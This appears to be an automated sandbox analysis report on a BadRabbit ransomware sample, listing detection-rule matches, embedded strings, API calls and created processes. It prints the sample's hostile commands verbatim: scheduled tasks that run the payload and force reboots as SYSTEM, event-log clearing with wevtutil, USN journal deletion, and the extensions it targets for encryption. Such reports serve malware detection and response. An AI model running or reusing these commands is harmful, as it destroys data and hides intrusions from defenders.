        Source: 23.0.dispci.exe.df0000.0.unpack, type: UNPACKEDPE Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.3.rundll32.exe.2cb4d60.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 2.3.rundll32.exe.2cb4d60.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 2.3.rundll32.exe.2cb4d60.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 2.2.rundll32.exe.2cb4d60.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 0.2.download.exe.10ce578.1.raw.unpack, type: UNPACKEDPE Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.2.rundll32.exe.2c371b8.1.unpack, type: UNPACKEDPE Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.2.rundll32.exe.2c371b8.1.unpack, type: UNPACKEDPE Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.2.rundll32.exe.2c371b8.1.unpack, type: UNPACKEDPE Matched rule: BadRabbit author = kevoreilly, description = BadRabbit Payload, cape_type = BadRabbit Payload
        Source: 2.2.rundll32.exe.4850000.2.unpack, type: UNPACKEDPE Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.2.rundll32.exe.4850000.2.unpack, type: UNPACKEDPE Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.2.rundll32.exe.4850000.2.unpack, type: UNPACKEDPE Matched rule: BadRabbit author = kevoreilly, description = BadRabbit Payload, cape_type = BadRabbit Payload
        Source: 2.2.rundll32.exe.2c371b8.1.raw.unpack, type: UNPACKEDPE Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.2.rundll32.exe.2c371b8.1.raw.unpack, type: UNPACKEDPE Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.2.rundll32.exe.2c371b8.1.raw.unpack, type: UNPACKEDPE Matched rule: BadRabbit author = kevoreilly, description = BadRabbit Payload, cape_type = BadRabbit Payload
        Source: 00000002.00000003.1717628248.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
        Source: C:\Windows\dispci.exe, type: DROPPED Matched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
        Source: C:\Windows\dispci.exe, type: DROPPED Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: C:\Windows\cscc.dat, type: DROPPED Matched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: cscc.dat.2.drBinary string: configFlags\Device\dcrypt\DosDevices\dcryptdump_hiber_%s\$dcsys$$dcsys$\Device\CdRom%s\$DC_TRIM_%x$$dcsys$_fail_%xNTFSFATFAT32exFATRSDS
        Source: rundll32.exe, 00000002.00000002.1754801710.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhost0.0.0.0\rundll32.exe%ws C:\Windows\%ws,#1 %wsSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilege%08X%08X/c %ws%wswevtutil cl %ws & SetupSystemSecurityApplicationfsutil usn deletejournal /D %c:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00schtasks /Delete /F /TN drogon255.255.255.255%u.%u.%u.%uC:\Windows\System32\rundll32.exe "C:\Windows\",#2 \\%s\admin$\\%ws\admin$\%wsprocess call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "wbem\wmic.exe%ws WaitForMultipleObjectskernel32
        Source: rundll32.exe, 00000002.00000003.1717628248.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, dispci.exe, 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp, dispci.exe, 00000017.00000000.1746531825.0000000000E03000.00000002.00000001.01000000.00000007.sdmp, dispci.exe.2.drBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted%lS OK
        Source: classification engine Classification label: mal100.rans.spre.troj.spyw.evad.winEXE@58/8@2/4
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_04857CC5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,SetLastError,2_2_04857CC5
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,2_2_04859534
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_04851368
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_048584EE CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,2_2_048584EE
        Source: C:\Windows\dispci.exe Code function: 23_2_00DF5150 CoInitialize,CoCreateInstance,GetModuleFileNameW,GetVersion,ExpandEnvironmentStringsW,Sleep,CoUninitialize,23_2_00DF5150
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_04858313 FindResourceW,LoadResource,LockResource,SizeofResource,GetProcessHeap,GetProcessHeap,HeapAlloc,RtlAllocateHeap,memcpy,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,RtlFreeHeap,2_2_04858313
        Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_04859534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,2_2_04859534
        Source: C:\Windows\dispci.exe File created: C:\Users\Public\Desktop\DECRYPT.lnk
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8180:120:WilError_03
        Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\82517A223AD6FDE5
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8040:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8092:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7984:120:WilError_03
        Source: download.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\download.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\Desktop\download.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
        Source: download.exe ReversingLabs: Detection: 97%
        Source: download.exe Virustotal: Detection: 88%
        Source: C:\Users\user\Desktop\download.exe File read: C:\Users\user\Desktop\download.exe
        Source: unknown Process created: C:\Users\user\Desktop\download.exe "C:\Users\user\Desktop\download.exe"
        Source: C:\Users\user\Desktop\download.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\download.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
        Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit"
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:43:00
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit"
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\2594.tmp "C:\Windows\2594.tmp" \\.\pipe\{D8F326F0-A034-43D5-AD41-3DA9EEB64FB1}
        Source: C:\Windows\2594.tmp Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:43:00
        Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
        Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 3065482610 && exit
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\dispci.exe "C:\Windows\dispci.exe" -id 3065482610
        Source: C:\Windows\dispci.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\dispci.exe Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN drogon
        Source: unknown Process created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x4 /state0:0xa3f61055 /state1:0x41c64e6d
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
        Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        Source: unknown Process created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x2 /state0:0xa3f6c855 /state1:0x41c64e6d
        Source: unknown Process created: C:\Windows\System32\fontdrvhost.exe "fontdrvhost.exe"
        Source: unknown Process created: C:\Windows\System32\fontdrvhost.exe "fontdrvhost.exe"
        Source: unknown Process created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x2 /state0:0xa3f74055 /state1:0x41c64e6d
        Source: unknown Process created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x2 /state0:0xa3f04055 /state1:0x41c64e6d
        Source: unknown Process created: C:\Windows\System32\fontdrvhost.exe "fontdrvhost.exe"
        Source: C:\Users\user\Desktop\download.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
        Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit"
        Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:43:00
        Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\2594.tmp "C:\Windows\2594.tmp" \\.\pipe\{D8F326F0-A034-43D5-AD41-3DA9EEB64FB1}
        Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
        Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN drogon
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit"
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:43:00
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\dispci.exe "C:\Windows\dispci.exe" -id 3065482610
        Source: C:\Windows\dispci.exe Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
        Source: C:\Users\user\Desktop\download.exe Section loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
        Source: C:\Windows\2594.tmp Section loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
        Source: C:\Windows\SysWOW64\wevtutil.exe Section loaded: wevtapi.dll
        Source: C:\Windows\SysWOW64\wevtutil.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\wevtutil.exe Section loaded: wevtapi.dll
        Source: C:\Windows\SysWOW64\wevtutil.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\wevtutil.exe Section loaded: wevtapi.dll
        Source: C:\Windows\SysWOW64\wevtutil.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\wevtutil.exe Section loaded: wevtapi.dll
        Source: C:\Windows\SysWOW64\wevtutil.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
        Source: C:\Windows\dispci.exe Section loaded: apphelp.dll
        Source: C:\Windows\dispci.exe Section loaded: netapi32.dll
        Source: C:\Windows\dispci.exe Section loaded: netutils.dll
        Source: C:\Windows\dispci.exe Section loaded: cryptsp.dll
        Source: C:\Windows\dispci.exe Section loaded: rsaenh.dll
        Source: C:\Windows\dispci.exe Section loaded: sspicli.dll
        Source: C:\Windows\dispci.exe Section loaded: profapi.dll
        Source: C:\Windows\dispci.exe Section loaded: dpapi.dll
        Source: C:\Windows\dispci.exe Section loaded: cryptbase.dll
        Source: C:\Windows\dispci.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\dispci.exe Section loaded: windows.storage.dll
        Source: C:\Windows\dispci.exe Section loaded: wldp.dll
        Source: C:\Windows\dispci.exe Section loaded: propsys.dll
        Source: C:\Windows\dispci.exe Section loaded: linkinfo.dll
        Source: C:\Windows\dispci.exe Section loaded: ntshrui.dll
        Source: C:\Windows\dispci.exe Section loaded: srvcli.dll
        Source: C:\Windows\dispci.exe Section loaded: cscapi.dll
        Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: logoncontroller.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: umpdc.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: dxgi.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: slc.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: sppc.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: dsreg.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: msvcp110_win.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: dwmapi.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: winsta.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: wtsapi32.dll
